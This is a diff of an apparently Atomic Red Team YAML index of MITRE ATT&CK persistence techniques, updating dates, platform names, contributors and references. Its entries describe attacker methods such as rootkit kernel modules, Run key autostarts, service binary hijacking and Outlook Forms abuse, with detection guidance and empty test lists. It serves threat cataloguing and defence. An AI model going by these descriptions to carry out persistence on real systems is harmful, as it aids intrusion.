       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -32176,11 +32605,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -32267,9 +32695,9 @@ persistence:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -32282,12 +32710,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1136.003:
     technique:
-      modified: '2024-03-28T16:14:28.678Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Create Account: Cloud Account'
       description: |-
         Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -32300,9 +32727,11 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Praetorian
       - Microsoft Threat Intelligence Center (MSTIC)
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Collect usage logs from cloud user and administrator accounts
         to identify unusual activity in the creation of new accounts and assignment
@@ -32311,13 +32740,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Creation'
       type: attack-pattern
@@ -32365,14 +32794,11 @@ persistence:
         url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.003
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -32408,16 +32834,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -32458,143 +32883,141 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests: []
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests: []
   T1574.013:
@@ -32631,7 +33054,7 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -32657,12 +33080,10 @@ persistence:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -32740,9 +33161,8 @@ persistence:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1542.004:
@@ -32769,7 +33189,7 @@ persistence:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -32791,41 +33211,10 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
-      type: attack-pattern
-      created: '2019-11-07T20:06:02.624Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.003
-        url: https://attack.mitre.org/techniques/T1137/003
-      - source_name: SensePost Outlook Forms
-        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
-        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
-          February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:00.782Z'
       name: Outlook Forms
       description: |-
         Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
@@ -32834,22 +33223,49 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+      created: '2019-11-07T20:06:02.624Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/003
+        external_id: T1137.003
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Forms
+        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+          February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574:
     technique:
@@ -32915,7 +33331,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -32989,11 +33404,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -33010,7 +33424,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -33020,7 +33433,7 @@ persistence:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -33029,19 +33442,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
